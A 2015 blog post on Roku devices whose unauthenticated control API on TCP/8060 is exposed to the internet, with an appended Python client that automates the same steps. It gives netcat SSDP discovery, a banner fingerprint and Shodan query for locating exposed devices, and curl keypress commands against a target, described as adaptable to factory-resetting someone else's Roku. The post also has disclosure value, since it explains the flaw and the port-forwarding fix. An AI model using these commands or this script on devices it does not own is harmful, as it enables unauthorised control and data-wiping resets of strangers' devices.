07/25/2015

How to Reboot or Factory-reset 1761 Internet-facing Roku Devices with a Few Curl Commands

** UPDATE 3 [7/27/2015] – Some pretty rad research by John Matherly on the Shodan blog based on some of these findings.

** UPDATE 2 [7/26/2015]: John Matherly of Shodan.io was kind enough to trigger an internet-wide scan of TCP/8060 to get a better picture of how many devices might be misconfigured to accept API commands from anyone on the internet. Should have some accurate numbers soon, but it’s currently looking like there are ~1900+ devices out there with their API ports hanging out all over the place.

After digging a little bit more… the Shodan search actually returned results for UPnP port 1900 and not 8060. UDP/1900 is where a Roku advertises itself over SSDP to clients on the same LAN (the Roku mobile app, for example); it is a discovery port, not the port the API commands go to. I don’t believe it’s possible to use that port to issue the API commands I reference to IPs with UDP/1900 open.

Also, if you want to find the IP addresses of Roku devices on the network you’re on, you’ll have to:

1. Create a file (ROKU_SSDP_REQUEST.txt) with the following in it, ending with a blank line:

M-SEARCH * HTTP/1.1
Host: 239.255.255.250:1900
Man: "ssdp:discover"
ST: roku:ecp

(SSDP is HTTP over UDP, so those header lines should end in CRLF rather than a bare LF; if nothing answers, check the file’s line endings first.)

2. Feed that request to netcat while sending to the multicast address on UDP 1900:

nc -u 239.255.255.250 1900 < ROKU_SSDP_REQUEST.txt

3. Use Wireshark to catch any responses (they come back unicast to the port netcat sent from). You should see a LOCATION response header with the IP of any Rokus in the vicinity:

HTTP/1.1 200 OK
Cache-Control: max-age=3600
ST: roku:ecp
USN: uuid:roku:ecp:[SERIALNUMBER]
Ext:
Server: Roku UPnP/1.0 MiniUPnPd/1.4
LOCATION: http://192.168.29.181:8060/

It may still be possible to identify Rokus with internet-facing TCP/8060 ports with something like masscan, looking for internet IPs that respond with a Server header of “Roku UPnP/1.0 MiniUPnPd/1.4”:

netcat [internet_ip] 8060
HTTP/1.1 400 Bad Request

Server: Roku UPnP/1.0 MiniUPnPd/1.4

Content-Length: 0

I wrote a simple script you can use to bounce a Roku via a bash shell. You can modify this to navigate to other functions like… “factory reset”, although that would just be MEAN. The script basically issues “keypress” commands to the API at TCP/8060, which, in turn, navigate through the menus. Example:

curl -d '' http://$TARGET:8060/keypress/home
curl -d '' http://$TARGET:8060/keypress/down
curl -d '' http://$TARGET:8060/keypress/up
curl -d '' http://$TARGET:8060/keypress/right

etc.

The Roku API keypress options are:

Home
Rev
Fwd
Play
Select
Left
Right
Down
Up
Back
InstantReplay
Info
Backspace
Search
Enter
Lit_* (a literal character: Lit_ followed by the URL-encoded character, so Lit_a presses the letter a)

You can use this as a reference to their API. Here’s a Shodan query with what looks like Roku devices with their API ports facing the internet. *WHY* are they facing the internet? Who knows… but that’s a horrible idea. ECP has no authentication of its own, so anyone who can reach TCP/8060 can press buttons on the box; the fix is simply not to forward that port to the internet. https://www.shodan.io/search?query=ROKU There are currently 1761 Roku API ports exposed on the internet.
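The SSDP discovery exchange, the TCP/8060 Server-header check and the keypress API from the sections above, pulled together into one small client. This is an added example, not the post’s own bash script and not Roku’s code. What it takes from the page: the M-SEARCH for ST roku:ecp on 239.255.255.250:1900, the LOCATION header pointing at http://<ip>:8060/, the “Roku UPnP/1.0 MiniUPnPd/1.4” Server header, and POST /keypress/<key> with an empty body. What it assumes beyond the page: an MX header in the M-SEARCH (from the SSDP spec), Lit_ followed by the URL-encoded character for literal keys (from the ECP spec), and the two sample replies, which are constructed to look like the ones shown above.

```python
"""Minimal Roku ECP helper: SSDP discovery, TCP/8060 banner check, keypress paths.

Added example, not the post's script. Behaviour follows what the page shows;
the MX header and Lit_ URL-encoding are assumptions from the SSDP/ECP specs.
"""
import socket
import urllib.parse
import urllib.request

SSDP_ADDR = ("239.255.255.250", 1900)
ECP_SERVER_BANNER = "Roku UPnP/1.0 MiniUPnPd/1.4"
# Named keys listed on the page; any other single character goes via Lit_.
KEYS = {"Home", "Rev", "Fwd", "Play", "Select", "Left", "Right", "Down", "Up",
        "Back", "InstantReplay", "Info", "Backspace", "Search", "Enter"}

# Constructed sample replies, shaped like the ones shown in the post.
SAMPLE_SSDP_REPLY = (b"HTTP/1.1 200 OK\r\nCache-Control: max-age=3600\r\nST: roku:ecp\r\n"
                     b"USN: uuid:roku:ecp:SERIALNUMBER\r\nExt:\r\n"
                     b"Server: Roku UPnP/1.0 MiniUPnPd/1.4\r\n"
                     b"LOCATION: http://192.168.29.181:8060/\r\n\r\n")
SAMPLE_ECP_BANNER = (b"HTTP/1.1 400 Bad Request\r\nServer: Roku UPnP/1.0 MiniUPnPd/1.4\r\n"
                     b"Content-Length: 0\r\n\r\n")

def build_msearch(st="roku:ecp", mx=3):
    """SSDP M-SEARCH: CRLF-terminated headers plus the trailing blank line that
    the netcat step in the post needs the request file to contain."""
    return (f"M-SEARCH * HTTP/1.1\r\nHost: {SSDP_ADDR[0]}:{SSDP_ADDR[1]}\r\n"
            f'Man: "ssdp:discover"\r\nMX: {mx}\r\nST: {st}\r\n\r\n').encode()

def parse_headers(raw):
    """Status line and lower-cased header dict of an HTTP-style reply (SSDP
    answer or ECP banner); stops at the blank line that ends the headers."""
    lines = raw.decode("utf-8", "replace").replace("\r\n", "\n").split("\n")
    status, headers = lines[0].strip(), {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers

def ecp_location(ssdp_reply):
    """ECP base URL from an SSDP reply, or None if it is not a Roku ECP answer."""
    status, h = parse_headers(ssdp_reply)
    if not status.startswith("HTTP/1.1 200") or h.get("st") != "roku:ecp":
        return None
    return h.get("location")

def looks_like_roku_ecp(banner):
    """TCP/8060 fingerprint: the Server header the post observed, whatever the
    status line says (a bare netcat connection gets a 400, as shown above)."""
    _, h = parse_headers(banner)
    return h.get("server") == ECP_SERVER_BANNER

def keypress_path(key):
    """/keypress/ path for a named key, or Lit_<URL-encoded char> for a literal."""
    if key in KEYS:
        return f"/keypress/{key}"
    if len(key) == 1:
        return "/keypress/Lit_" + urllib.parse.quote(key, safe="")
    raise ValueError(f"not an ECP key or a single character: {key!r}")

def discover(timeout=3.0):
    """Multicast the M-SEARCH and collect ECP base URLs of Rokus on the LAN.
    Replies come back unicast to the socket's source port. Network I/O."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    found = set()
    try:
        sock.sendto(build_msearch(), SSDP_ADDR)
        while True:
            data, _ = sock.recvfrom(4096)
            loc = ecp_location(data)
            if loc:
                found.add(loc)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return sorted(found)

def send_keys(base_url, keys, timeout=5.0):
    """POST each key in order with an empty body, as the curl lines do.
    ECP has no authentication, so only point this at a device you own."""
    for key in keys:
        req = urllib.request.Request(base_url.rstrip("/") + keypress_path(key),
                                     data=b"", method="POST")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            if resp.status != 200:
                raise RuntimeError(f"{key}: HTTP {resp.status}")

if __name__ == "__main__":
    print(ecp_location(SAMPLE_SSDP_REPLY))          # http://192.168.29.181:8060/
    print(looks_like_roku_ecp(SAMPLE_ECP_BANNER))   # True
    print([keypress_path(c) for c in "hi there"])
    # On your own LAN:  for url in discover(): send_keys(url, ["Home"])
```

Run as-is it only exercises the parsers against the constructed replies; discover() and send_keys() do real network I/O and are meant for a LAN you control. The point of parse_headers() stopping at the blank line and lower-casing names is that the SSDP reply and the 8060 banner are both plain HTTP-style headers, so one parser handles the discovery step and the fingerprint step.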

